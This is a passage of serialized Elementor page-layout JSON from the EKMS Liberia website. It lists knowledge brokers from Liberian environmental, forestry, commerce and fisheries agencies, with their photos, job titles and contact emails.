below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental 